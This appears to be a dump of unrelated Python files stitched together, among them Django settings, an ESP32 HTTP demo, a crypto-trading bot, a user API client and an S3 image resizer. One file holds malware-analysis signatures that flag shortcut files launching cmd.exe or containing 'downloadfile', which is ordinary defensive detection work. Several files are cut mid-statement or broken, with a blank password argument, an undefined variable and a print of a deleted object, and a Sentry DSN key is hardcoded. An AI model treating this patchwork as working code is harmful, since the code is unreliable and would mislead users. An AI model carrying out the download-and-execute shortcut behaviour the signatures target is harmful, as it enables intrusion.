list(range(5, 8))] + ["23"] else: CHROMOSOMES = ["{}".format(i) for i in list(range(1, 24))] # Applications installed INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', # Local apps. Update these if you add or change app names! 'imputer.apps.ImputerConfig', 'datauploader.apps.DatauploaderConfig', 'open_humans.apps.OpenHumansConfig', 'main.apps.MainConfig' ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', 'whitenoise.middleware.WhiteNoiseMiddleware' ] MIDDLEWARE_CLASSES = ( # Simplified static file serving. # https://warehouse.python.org/project/whitenoise/ 'whitenoise.middleware.WhiteNoiseMiddleware' ) ROOT_URLCONF = 'openhumansimputer.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [os.path.join(BASE_DIR, 'templates')], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'openhumansimputer.wsgi.application' # Database # https://docs.djangoproject.com/en/2.0/ref/settings/#databases # https://devcenter.heroku.com/articles/django-app-configuration DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } db_from_env = dj_database_url.config(conn_max_age=500) DATABASES['default'].update(db_from_env) # Password validation # https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': ('django.contrib.auth.password_validation.' 'UserAttributeSimilarityValidator'), }, { 'NAME': ('django.contrib.auth.password_validation.' 'MinimumLengthValidator'), }, { 'NAME': ('django.contrib.auth.password_validation.' 'CommonPasswordValidator'), }, { 'NAME': ('django.contrib.auth.password_validation.' 'NumericPasswordValidator'), }, ] # Configure logging. LOGGING = { 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'verbose': { 'format': '%(asctime)s %(levelname)s [%(name)s:%(lineno)s] %(module)s %(process)d %(thread)d %(message)s' } }, 'handlers': { 'gunicorn': { 'level': 'DEBUG', 'class': 'logging.handlers.RotatingFileHandler', 'formatter': 'verbose', 'filename': os.path.join(LOG_DIR, 'gunicorn.errors'), 'maxBytes': 1024 * 1024 * 200, # 100 mb }, 'console': { 'class': 'logging.StreamHandler', }, }, 'loggers': { 'gunicorn.errors': { 'level': 'DEBUG', 'handlers': ['gunicorn'], 'propagate': True, }, 'oh': { 'level': 'DEBUG', 'handlers': ['console'], 'propogate': True } } } # Internationalization # https://docs.djangoproject.com/en/2.0/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/2.0/howto/static-files/ STATIC_ROOT = os.path.join(BASE_DIR, 'static') STATIC_URL = '/static/' STATICFILES_FINDERS = [ 'django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder', ] STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage' INSTALLED_APPS += ['django_extensions'] # celery settings CELERY_BROKER_URL = os.getenv('CELERY_BROKER_URL') # Directory config, change these if you have a different setup. # Also make sure these are in /etc/default/celeryd IMP_BIN = os.path.join(BASE_DATA_DIR, os.getenv('IMP_BIN')) REF_PANEL = os.path.join(BASE_DATA_DIR, os.getenv('REF_PANEL')) DATA_DIR = os.path.join(BASE_DATA_DIR, os.getenv('DATA_DIR')) REF_FA = os.path.join(BASE_DATA_DIR, os.getenv('REF_FA')) OUT_DIR = os.path.join(BASE_DATA_DIR, os.getenv('OUT_DIR')) # Sentry sentry_sdk.init( dsn="https://113d97f46e91488b91cc664e94a9d8e2@sentry.io/1294965", integrations=[DjangoIntegration(), CeleryIntegration()] ) class Person: """Create a new Person""" def __init__(self, fname, lname): self.fname = fname self.lname = lname newPerson = Person("Dony", "Beckar") anotherOne = Person("first", "last") newPerson.fname = "Cris" newPerson.lname = "Ronaldo" del newPerson #Displaying the output print(newPerson) # print(newPerson.fname) # print(newPerson.lname) # print(anotherOne.fname) # print(anotherOne.lname)# SPDX-FileCopyrightText: 2021 ladyada for Adafruit Industries # SPDX-License-Identifier: MIT import board import busio from digitalio import DigitalInOut import adafruit_esp32spi.adafruit_esp32spi_socket as socket from adafruit_esp32spi import adafruit_esp32spi import adafruit_requests as requests # Add a secrets.py to your filesystem that has a dictionary called secrets with "ssid" and # "password" keys with your WiFi credentials. DO NOT share that file or commit it into Git or other # source control. # pylint: disable=no-name-in-module,wrong-import-order try: from secrets import secrets except ImportError: print("WiFi secrets are kept in secrets.py, please add them there!") raise # If you are using a board with pre-defined ESP32 Pins: esp32_cs = DigitalInOut(board.ESP_CS) esp32_ready = DigitalInOut(board.ESP_BUSY) esp32_reset = DigitalInOut(board.ESP_RESET) # If you have an externally connected ESP32: # esp32_cs = DigitalInOut(board.D9) # esp32_ready = DigitalInOut(board.D10) # esp32_reset = DigitalInOut(board.D5) spi = busio.SPI(board.SCK, board.MOSI, board.MISO) esp = adafruit_esp32spi.ESP_SPIcontrol(spi, esp32_cs, esp32_ready, esp32_reset) print("Connecting to AP...") while not esp.is_connected: try: esp.connect_AP(secrets["ssid"], secrets["password"]) except RuntimeError as e: print("could not connect to AP, retrying: ", e) continue print("Connected to", str(esp.ssid, "utf-8"), "\tRSSI:", esp.rssi) # Initialize a requests object with a socket and esp32spi interface socket.set_interface(esp) requests.set_socket(socket, esp) JSON_GET_URL = "http://httpbin.org/get" # Define a custom header as a dict. headers = {"user-agent": "blinka/1.0.0"} print("Fetching JSON data from %s..." % JSON_GET_URL) response = requests.get(JSON_GET_URL, headers=headers) print("-" * 60) json_data = response.json() headers = json_data["headers"] print("Response's Custom User-Agent Header: {0}".format(headers["User-Agent"])) print("-" * 60) # Read Response's HTTP status code print("Response HTTP Status Code: ", response.status_code) print("-" * 60) # Close, delete and collect the response data response.close() print('Yo world!') 1-10 #!/usr/bin/env python from iris_sdk.models.base_resource import BaseData from iris_sdk.models.data.losing_carrier_tn_list import LosingCarrierTnList from iris_sdk.models.maps.lnp_losing_carriers import LnpLosingCarriersMap class LnpLosingCarriers(LnpLosingCarriersMap, BaseData): def __init__(self): self.losing_carrier_tn_list = LosingCarrierTnList()from .tacotron import Tacotron """ API Response Objects """ import datetime from fastapp.models import FastAppModel class PingResponse(FastAppModel): """ Response returned for the `/ping` endpoint """ healthy: bool = True status: int timestamp: datetime.datetime class SentimentResponse(FastAppModel): """ Response returned from the `/sentiment` endpoint """ neg: float neu: float pos: float compound: float 0 import numpy as np def RGB_from_hex(hex: str, norm=True): rgb = tuple(int(hex.lstrip('#')[i:i + 2], 16) for i in (0, 2, 4)) if norm: rgb = np.array(rgb)/255 return rgb jiportilla/ontologypython/nlusvc/core/svc/remove_stop_words.py #!/usr/bin/env python # -*- coding: UTF-8 -*- from base import BaseObject from base import DataTypeError from datadict import LoadStopWords class RemoveStopWords(BaseObject): """ Remove Stop Words from Unstructured Text """ def __init__(self, is_debug: bool = False): """ Created: 28-Jun-2019 * refactored out of text-api Updated: 9-Aug-2019 * minor updates in pursuit of https://github.ibm.com/GTS-CDO/unstructured-analytics/issues/688 Updated: 25-Feb-2020 * rewriting to fix defects in this service (I don't understand why the prior version was so complex) https://github.ibm.com/GTS-CDO/unstructured-analytics/issues/1878 """ BaseObject.__init__(self, __name__) self.is_debug = is_debug self.loader = LoadStopWords(is_debug=self.is_debug) def _replace(self, some_stopword: str, some_input_text: str) -> str: original_input = some_input_text some_stopword = some_stopword.lower().strip() some_input_text = some_input_text.lower().strip() if some_stopword == some_input_text: return "" def substr(x: int) -> str: y = len(some_stopword) + x + 1 modified_input = f"{original_input[:x]} {original_input[y:]}" modified_input = modified_input.replace(' ', ' ') return self._replace(some_stopword, modified_input) fq = " {} ".format(some_stopword) if fq in some_input_text: return substr(some_input_text.index(fq)) lq = " {}".format(some_stopword) if some_input_text.endswith(lq): return substr(some_input_text.index(lq)) rq = "{} ".format(some_stopword) if some_input_text.startswith(rq): return substr(some_input_text.index(rq)) return some_input_text def process(self, input_text: str or list, aggressive: bool = False) -> str or list: """ :param input_text: :param aggressive: :return: """ def _stopwords(): if not aggressive: return self.loader.standard() return self.loader.load() if type(input_text) == str: for stopword in _stopwords(): input_text = self._replace(stopword, input_text) return input_text elif type(input_text) == list: results = [] for input_item in list(input_text): for stopword in _stopwords(): input_item = self._replace(stopword, input_item) results.append(input_item) return results else: raise DataTypeError("Expected Str or List Input") from django.urls import path, include from productapp import api urlpatterns = [ path('product/', api.ProductApiView.as_view()), path('category/', api.CategoryApiView.as_view()), path('profile/', api.ProfileApiView.as_view()), path('order/', api.OrderApiView.as_view()), path('invoice/', api.InvoiceApiView.as_view()), ]# Copyright (c) Microsoft Corporation. # Licensed under the MIT License. from bson.objectid import ObjectId from sklearn.base import BaseEstimator from sklearn.linear_model import LogisticRegression from sklearn.neural_network import BernoulliRBM from sklearn.pipeline import make_pipeline from sklearn.preprocessing import StandardScaler from sklearn.semi_supervised import LabelSpreading from sklearn.svm import SVC from sklearn.tree import DecisionTreeClassifier from .data_persistence import is_saved, load, save from ..types import Model def load_estimator(model: Model) -> BaseEstimator: estimator_type = model['type'] estimator_id = model['objectId'] assert estimator_type in [ 'DecisionTree', 'SVM', 'LogisticRegression', 'RestrictedBoltzmannMachine', 'LabelSpreading', ] if is_saved(inserted_id=ObjectId(estimator_id)): estimator = load(inserted_id=ObjectId(estimator_id)) else: if estimator_type == 'DecisionTree': estimator = DecisionTreeClassifier() if estimator_type == 'SVM': estimator = SVC(gamma=0.001) if estimator_type == 'LogisticRegression': estimator = make_pipeline( StandardScaler(), LogisticRegression(C=1, penalty='l2', tol=0.01, solver='saga'), ) if estimator_type == 'LabelSpreading': estimator = LabelSpreading(gamma=0.25, max_iter=20) if estimator_type == 'RestrictedBoltzmannMachine': estimator = make_pipeline( BernoulliRBM(random_state=0), LogisticRegression(solver='newton-cg', tol=1), ) save(data=estimator, inserted_id=ObjectId(estimator_id)) return estimator from typing import List from Models.Enums.WebdriverEnum import WebdriverEnum class ConfigWebdriverModel(): driver_type: WebdriverEnum driver_path: str extension_paths: List[str] def __init__(self, json): self.driver_type = WebdriverEnum[json['driver_type']] self.driver_path = json['driver_path'] self.extension_paths = json['extension_paths']10-100 # Copyright (c) 2018, # Copyright (c) 2018, Xilinx, Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # 3. Neither the name of the copyright holder nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; # OR BUSINESS INTERRUPTION). HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF # ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. from abc import ABCMeta, abstractmethod, abstractproperty import numpy as np import cffi import os from pynq import Overlay, PL, Xlnk LSTM_ROOT_DIR = os.path.dirname(os.path.realpath(__file__)) LSTM_LIB_DIR = os.path.join(LSTM_ROOT_DIR, 'libraries') LSTM_BIT_DIR = os.path.join(LSTM_ROOT_DIR, 'bitstreams') LSTM_DATA_DIR = os.path.join(LSTM_ROOT_DIR, 'datasets') RUNTIME_HW = "python_hw" RUNTIME_SW = "python_sw" class PynqLSTM(object): __metaclass__ = ABCMeta def __init__(self, runtime, network, load_overlay): self._ffi = cffi.FFI() self._libraries = {} if runtime == RUNTIME_HW: self.bitstream_name="{0}.bit".format(network) self.bitstream_path=os.path.join(LSTM_BIT_DIR, self.bitstream_name) if PL.bitfile_name != self.bitstream_path: if load_overlay: Overlay(self.bitstream_path).download() else: raise RuntimeError("Incorrect Overlay loaded") dllname = "{0}-{1}.so".format(runtime, network) if dllname not in self._libraries: self._libraries[dllname] = self._ffi.dlopen( os.path.join(LSTM_LIB_DIR, dllname)) self.interface = self._libraries[dllname] self._ffi.cdef(self.ffi_interface) @property def ops_per_seq_element(self): return self.lstm_ops_per_seq_element @property def lstm_ops_per_seq_element(self): gate_input_size = self.input_size + self.hidden_size + 1 if self.bias_enabled else self.input_size + self.hidden_size #2 accounts for mul and add separately, 4 is the number of gates ops = 2 * gate_input_size * 4 * self.hidden_size #element wise muls and peepholes ops = ops + 3 * self.hidden_size * 2 if self.peepholes_enabled else ops + 3 * self.hidden_size #directions return ops * 2 if self.bidirectional_enabled else ops def cleanup(self): xlnk = Xlnk() xlnk.xlnk_reset() @abstractproperty def input_size(self): pass @abstractproperty def hidden_size(self): pass @abstractproperty def peepholes_enabled(self): pass @abstractproperty def bias_enabled(self): pass @abstractproperty def bidirectional_enabled(self): pass @abstractproperty def ffi_interface(self): pass @abstractmethod def inference(self, path): pass @abstractmethod def preprocess(self, input_data): pass """Built-in plugins template for autofile""" mmpi/data/signatures/lnk/lnk_infos.py # -*- coding: utf-8 -*- # @Time : 2021/01/14 00:28:17 # @Author : ddvv # @Site : https://ddvvmmzz.github.io # @File : lnk_infos.py # @Software: Visual Studio Code from data_lib.mmpi.common.abstracts import Signature class LnkExecCMD(Signature): authors = ["ddvv"] sig_type = 'lnk' name = "lnk_exec_cmd" severity = 6 description = "lnk exec cmd" def on_complete(self): results = self.get_results() for result in results: if result.get('type', '') == self.sig_type: infos = result.get('value', {}).get('infos', []) for info in infos: relativePath = info.get('data', {}).get('relativePath', '') if relativePath: if relativePath.endswith('cmd.exe'): self.mark(type="lnk", tag=self.name, relativePath=relativePath) return self.has_marks() return None class LnkDownloadFile(Signature): authors = ["ddvv"] sig_type = 'lnk' name = "lnk_download_file" severity = 9 description = "lnk download file" def on_complete(self): results = self.get_results() for result in results: if result.get('type', '') == self.sig_type: infos = result.get('value', {}).get('infos', []) for info in infos: commandLineArguments = info.get('data', {}).get('commandLineArguments', '') if commandLineArguments: if 'downloadfile' in commandLineArguments: self.mark(type="lnk", tag=self.name, commandLineArguments=commandLineArguments) return self.has_marks() return None# -*- coding: utf-8 -*- from . import stock_data as ed from . import macro_data as md from .my_logging import get_logger logger = get_logger() def get_spm_price(equity_code, report_period, required_return=None): ''' Sum of Perpetuities Method (SPM) P = E * G / K**2 + D / K where P: price E: EPS G: growth rate K: required return, discount rate D: dividend per share ''' e = ed.get_net_income(equity_code, report_period) / ed.get_total_share(equity_code, report_period) g = get_growth_rate(equity_code, report_period) if required_return is None: k = md.get_deposit_rate('定期存款整存整取(五年)') else: k = required_return d =ed.get_dividend_per_share(equity_code, report_period) price = e * g / k**2 + d / k return price def get_ggm_price(equity_code, report_period, required_return=None): ''' Gordon Growth Model (GGM). It is a special case of Dividend Discount Model (DDM). P = D0 * (1 + g) / (r - g) where P: price D0: dividend g: growth rate r: required return ''' d0 = ed.get_dividend_per_share(equity_code, report_period) g = get_growth_rate(equity_code, report_period) if required_return is None: r = md.get_deposit_rate('定期存款整存整取(五年)') else: r = required_return price = d0 * (1 + g) / (r - g) return price def get_growth_rate(equity_code, report_period): """ growth rate = ROE * retention ratio """ roe = get_roe(equity_code, report_period) retention_ratio = ed.get_retention_ratio(equity_code, report_period) growth_rate = roe * retention_ratio logger.debug('growth_rate=%s', growth_rate) return growth_rate def get_dividend_growth_rate(equity_code, report_period): """ TODO: Geometric mean of the dividend growth in each year """ def validate_dividend_growth_rate(): """ TODO: The dividend growth rate should not be much far away from GDP growth rate """ def get_roe(equity_code, report_period): net_income = ed.get_net_income(equity_code, report_period) total_equity = ed.get_total_equity(equity_code, report_period) roe = net_income / total_equity logger.debug('roe=%s', roe) return roe def get_roa(equity_code, report_period): net_income = ed.get_net_income(equity_code, report_period) total_asset = ed.get_total_asset(equity_code, report_period) roa = net_income / total_asset logger.debug('roa=%s', roa) return roa def get_rrr_capm(beta=None, rm=None): ''' TODO: Get required rate of return by Capital Asset Pricing Model (CAPM) rrr from CAPM = rf + beta(rm - rf) where rrr: required rate of return rf: Risk free rate beta: market risk rm: expected market return ''' logger.debug('beta=%s, rm=%s', beta, rm) rf = md.get_deposit_rate('定期存款整存整取(五年)') if beta is None: beta = 1 if rm is None: rm = 0.1 rrr_from_capm = rf + beta * (rm - rf) logger.debug('rrr_from_capm=%s', rrr_from_capm) return rrr_from_capm def get_rrr_wacc(equity_code, report_period): ''' TODO: Get required rate of return using Weighted Average Cost of Capital (WACC) rrr from WACC = (total equity / total asset) * cost of equity + (total debt / total asset) * cost of debt * (1 - tax rate) ''' logger.debug('equity_code=%s, report_period=%s', equity_code, report_period) total_asset = ed.get_total_asset(equity_code, report_period) total_equity = ed.get_total_equity(equity_code, report_period) total_debt = ed.get_total_debt(equity_code, report_period) # Tax rate in China is average 40% tax_rate = 0.4 # TODO: Calculate cost of debt of the company. Here is using loan rate. cost_of_debt = md.get_loan_rate('中长期贷款(五年以上)', report_period) # TODO:Calculate cost of equity. Here is using dividend ratio. cost_of_equity = 1 - ed.get_retention_ratio(equity_code, report_period) rrr_from_wacc = (total_equity / total_asset) * cost_of_equity + (total_debt / total_asset) * cost_of_debt * (1 - tax_rate) logger.debug('rrr_from_wacc=%s', rrr_from_wacc) return rrr_from_wacc """A Tcl kernel for Jupyter""" __version__ = '0.0.4' t = src() if x == t: y = "ola" else: y = "adeus" snk(y) brianhaines/CryptoBot #!/usr/bin/env python3 from settings import API_KEY from settings import API_SECRET from settings import API_PASSPHRASE from settings import PRODUCTS from settings import DBNAME from settings import DB_USER from settings import DB_PASSWORD from event import TickEvent from strategy import MovingAverageStrategy from decimal import Decimal, getcontext, ROUND_HALF_DOWN import pymysql.cursors import logging import queue import threading import time import gdax class CryptoBot(gdax.WebsocketClient): def __init__(self, product=None, events=None, key=None, secret=None, passphrase=None, channel=None): super(CryptoBot, self).__init__(products=product, channels=channel) def on_open(self): self.events_queue = events self.url = "wss://ws-feed.gdax.com/" self.message_count = 0 print("Let the streaming begin!") def on_message(self,msg): b = len(PRODUCTS) if msg['type'] == 'ticker': if self.message_count > b: self.events_queue.put( TickEvent( product = msg['product_id'], sequence = msg['sequence'], time = msg['time'], price = Decimal(msg['price']), bid = Decimal(msg['best_bid']), ask = Decimal(msg['best_ask']), spread = Decimal(msg['best_ask']) - Decimal(msg['best_bid']), side = msg['side'], size = Decimal(msg['last_size']).quantize(Decimal('0.000000001'),rounding=ROUND_HALF_DOWN) ) ) else: print(msg) self.message_count += 1 def on_close(self): print('Closing time!') def trade(events,strategy): latestPrices= {} latestPrices['USD-USD'] = {"bid": Decimal("1.0"), "ask": Decimal("1.0"),"last":Decimal("1.0")} arbitrages = {} arbitrages['ETH-BTC'] = {'in':Decimal('0.0000'),'out':Decimal('0.0000'),'spread':Decimal('0.0000')} for prod in PRODUCTS: latestPrices[prod] = {"bid": None, "ask": None,"last":None} conn = pymysql.connect(host='localhost', user=DB_USER, password=, db=DBNAME, cursorclass=pymysql.cursors.DictCursor) try: while True: try: event = events.get(False) except queue.Empty: pass else: if event is not None: if event.type == 'TICK': latestPrices[event.product] = {'bid':event.bid,'ask':event.ask,'last':event.price} # Send tick to strategy strategy.calculateSignal(event) with conn.cursor() as cursor: sql = '''INSERT INTO ticks(sequence, product, time, price, bid, ask, spread, side, size) VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s)''' cursor.execute(sql,(event.sequence, event.product, event.time, event.price, event.bid, event.ask, event.spread, event.side, event.size)) conn.commit() if event.product == 'ETH-BTC': # Buy BTC-USD, buy ETH-BTC, sell ETH-USD arbitrages[event.product]['in'] = latestPrices['ETH-USD']['bid'] / latestPrices['BTC-USD']['ask'] - latestPrices['ETH-BTC']['ask'] # Buy ETH-USD, sell ETH-BTC, sell BTC-USD arbitrages[event.product]['out'] = latestPrices['ETH-USD']['ask'] / latestPrices['BTC-USD']['bid'] - latestPrices['ETH-BTC']['bid'] # Arb spread arbitrages[event.product]['spread'] = arbitrages[event.product]['out'] - arbitrages[event.product]['in'] with conn.cursor() as cursor: sql = '''INSERT INTO arbitrage(product, time, arb_in, arb_out, arb_spread, arb_size_in, arb_size_out) VALUES(%s,%s,%s,%s,%s,%s,%s)''' cursor.execute(sql,(event.product, event.time, round(arbitrages[event.product]['in'],9), round(arbitrages[event.product]['out'],9), round(arbitrages[event.product]['spread'],9),None,None)) conn.commit() elif event.sequence % 25 == 0 or event.size > 2: print('This is a {0} Tick: {1} and {2} / {3}'.format( event.product, latestPrices[event.product]['last'], latestPrices[event.product]['bid'], latestPrices[event.product]['ask'] )) elif event.type == 'SIGNAL': print('This is a SIGNAL: {0} {1} params: {2}/{3}'.format(event.side,event.market,event.sig_params['short_sma'],event.sig_params['long_sma'])) except KeyboardInterrupt: print('Closing Time') CryptoBot.close() conn.close() if __name__ == '__main__': channel = ['ticker'] events = queue.Queue() # Streaming prices streamingPrices = CryptoBot( product = PRODUCTS, channel = channel, events = events, secret = API_SECRET, key = API_KEY, passphrase = API_PASSPHRASE ) # The trading strategy strategy = MovingAverageStrategy(PRODUCTS, events) trade_thread = threading.Thread(target=trade, args=(events, strategy)) streamingPrices.start() trade_thread.start() entry.py0 #!/usr/bin/env python from telnyx_2fa.app import main main() #!/usr/bin/env python from __future__ import print_function from __future__ import unicode_literals try: from urllib.parse import quote as urlquote # >=3.0 except ImportError: from urllib import quote as urlquote class UserAPI(object): #### ## User API ## def authenticate(self, user, password): """ TODO: add docstring apikey:str """ with self.post("/v3/user/authenticate", {"user": user, "password": password}) as res: code, body = res.status, res.read() if code != 200: self.raise_error("Authentication failed", res, body) js = self.checked_json(body, ["apikey"]) apikey = js["apikey"] return apikey def list_users(self): """ TODO: add docstring => [[name:str,organization:str,[user:str]] """ with self.get("/v3/user/list") as res: code, body = res.status, res.read() if code != 200: self.raise_error("List users failed", res, body) js = self.checked_json(body, ["users"]) def user(roleinfo): name = roleinfo["name"] email = roleinfo["email"] return (name, None, None, email) # set None to org and role for API compatibility return [ user(roleinfo) for roleinfo in js["users"] ] def add_user(self, name, org, email, password): """ TODO: add docstring => True """ params = {"organization": org, "email": email, "password": password} with self.post("/v3/user/add/%s" % (urlquote(str(name))), params) as res: code, body = res.status, res.read() if code != 200: self.raise_error("Adding user failed", res, body) return True def remove_user(self, name): """ TODO: add docstring => True """ with self.post("/v3/user/remove/%s" % (urlquote(str(name)))) as res: code, body = res.status, res.read() if code != 200: self.raise_error("Removing user failed", res, body) return True def change_email(self, name, email): """ TODO: add docstring => True """ params = {"email": email} with self.post("/v3/user/email/change/%s" % (urlquote(str(name))), params) as res: code, body = res.status, res.read() if code != 200: self.raise_error("Changing email failed", res, body) return True def list_apikeys(self, name): """ TODO: add docstring => [apikey:str] """ with self.get("/v3/user/apikey/list/%s" % (urlquote(str(name)))) as res: code, body = res.status, res.read() if code != 200: self.raise_error("List API keys failed", res, body) js = self.checked_json(body, ["apikeys"]) return js["apikeys"] def add_apikey(self, name): """ TODO: add docstring => True """ with self.post("/v3/user/apikey/add/%s" % (urlquote(str(name)))) as res: code, body = res.status, res.read() if code != 200: self.raise_error("Adding API key failed", res, body) return True def remove_apikey(self, name, apikey): """ TODO: add docstring => True """ params = {"apikey": apikey} with self.post("/v3/user/apikey/remove/%s" % (urlquote(str(name))), params) as res: code, body = res.status, res.read() if code != 200: self.raise_error("Removing API key failed", res, body) return True def change_password(self, name, password): """ TODO: add docstring => True """ params = {"password": password} with self.post("/v3/user/password/change/%s" % (urlquote(str(name))), params) as res: code, body = res.status, res.read() if code != 200: self.raise_error("Changing password failed", res, body) return True def change_my_password(self, old_password, password): """ TODO: add docstring => True """ params = {"old_password": _password, "password": password} with self.post("/v3/user/password/change", params) as res: code, body = res.status, res.read() if code != 200: self.raise_error("Changing password failed", res, body) return True import boto3 import os import uuid from urllib.parse import unquote_plus from PIL import Image s3_client = boto3.client('s3') def resize_image(picture_file_path, crop_dimensions=None): # get the profile pics store ready image = Image.open(picture_file_path) if crop_dimensions: image = image.crop(crop_dimensions) widthGet = os.environ.get('RESIZE_WIDTH') heightGet = os.environ.get('RESIZE_HEIGHT') width = int(widthGet) height = int(heightGet) image = image.resize((width, height)) # save and convert to jpg here cropped_filename = os.path.join(os.path.dirname(picture_file_path), "{}_cropped.jpg".format(picture_file_path)) thumbnail_filename = os.path.join(os.path.dirname(picture_file_path), "{}_thumbnail.jpg".format(picture_file_path)) image.save(cropped_filename) thumbnailWidthGet = os.environ.get('THUMBNAIL_WIDTH') thumbnailHeightGet = os.environ.get('THUMBNAIL_HEIGHT') thumbnailWidth = int(thumbnailWidthGet) thumbnailHeight = int(thumbnailHeightGet) image = image.resize((thumbnailWidth, thumbnailHeight)) image.save(thumbnail_filename) return (cropped_filename, thumbnail_filename) def handler(event, context): amplify_storage_bucket_name = os.environ.get('STORAGE_PLATELETSTORAGE_BUCKETNAME') print(os.environ) for record in event['Records']: bucket = record['s3']['bucket']['name'] key = unquote_plus(record['s3']['object']['key']) tmpkey = key.replace('/', '') download_path = '/tmp/{}{}'.format(uuid.uuid4(), tmpkey) print('Downloading {} from bucket {} to {}'.format(key, bucket, download_path)) s3_client.download_file(bucket, key, download_path) (newImage, thumbnail) = resize_image(download_path) base_key = key.split('.')[0] s3_client.upload_file(newImage, amplify_storage_bucket_name, key) s3_client.upload_file(thumbnail, amplify_storage_bucket_name, "{}_thumbnail.jpg".format(base_key)) s3_client.delete_object(Bucket=bucket, Key=key) pylith/mpi/Communicator.py0 # ---------------------------------------------------------------------- # # , U.S. Geological Survey # , GNS Science # , University of Chicago # # This code was developed as part of the Computational Infrastructure # for Geodynamics (http://geodynamics.org). # # Copyright (c) 2010-2017 University of California, Davis # # See COPYING for license information. # # ---------------------------------------------------------------------- # # @file pylith/mpi/Communicator.py ## # @brief Python MPI communicator object. ## # Provides SWIG friendly interface to MPI communicator object. ## # The communicator requires special treatment because we do not have # a normal SWIG interface definition. SWIG treats the communicator in # the same way it treats a pointer to an object, even if it is an # integer. import pylith.mpi.mpi as mpimodule # Communicator class class Communicator(object): """Python MPI communicator object. """ # PUBLIC METHODS ///////////////////////////////////////////////////// def __init__(self, handle): """Constructor. """ # Transfer responsibility of memory management from module to this # class. handle.disown() self.handle = handle self.rank = mpimodule.rank(self.handle) self.size = mpimodule.size(self.handle) return def __del__(self): del self.rank del self.size mpimodule.destroy_comm(self.handle) del self.handle return def barrier(self): """MPI Barrier. """ mpimodule.barrier(self.handle) return # ---------------------------------------------------------------------- def petsc_comm_world(): """Python wrapper around PETSC_COMM_WORLD. """ global _petsc_world if _petsc_world is None: _petsc_world = Communicator(mpimodule.petsc_comm_world()) return _petsc_world # ---------------------------------------------------------------------- def petsc_comm_self(): """Python wrapper around PETSC_COMM_SELF. """ global _petsc_self if _petsc_self is None: _petsc_self = Communicator(mpimodule.petsc_comm_self()) return _petsc_self # ---------------------------------------------------------------------- def mpi_comm_world(): """Python wrapper around MPI_COMM_WORLD. """ global _mpi_world if _mpi_world is None: _mpi_world = Communicator(mpimodule.mpi_comm_world()) return _mpi_world # ---------------------------------------------------------------------- def mpi_comm_self(): """Python wrapper around MPI_COMM_SELF. """ global _mpi_self if _mpi_self is None: _mpi_self = Communicator(mpimodule.mpi_comm_self()) return _mpi_self # ---------------------------------------------------------------------- # Singletons _petsc_world = None _petsc_self = None _mpi_world = None _mpi_self = None # End of file smcscript/commands.py # -*- coding: utf-8 -*- """ CLI functions """ from __future__ import print_function, unicode_literals import time import logging import os import sys import yaml import subprocess import tempfile from lxml import etree import etconfig from argh.decorators import arg, named from mako.template import Template from mako.lookup import TemplateLookup from mako.exceptions import TemplateLookupException, SyntaxException from smcscript.exceptions import SMCConnectionError, InvalidSessionError, \ ResolveError, SMCOperationFailure, CommandError from smcscript.session import Session as SMCSession from smcscript.api import SMCClient from smcscript.script import run_script, RunScriptError from smcscript.resolver import resolve_hname from smcscript.utils import get_session_file_path, print_err, print_fmt, save_session, load_session # pylint: disable=invalid-name logger = logging.getLogger(__name__) #---------------------------------------------------------------------- # commands #---------------------------------------------------------------------- @arg("server", help="address or name of the SMC to log to", default=None, nargs='?') @arg("-k", "--api-key", dest="api_key", required=False, help="api key of the SMC rest API") @arg("-s", "--secure", dest="secure", action="store_true", help="Use HTTPS to connect") @arg("-c", "--cacert", dest="ca_cert", help="path of the CA certificate to verify the connection") @arg("-p", "--port", default=8082, help="TCP port of the SMC rest API") @arg("-v", "--version", help="API version to use (e.g. 6.4). If not specified, the highest version is selected") 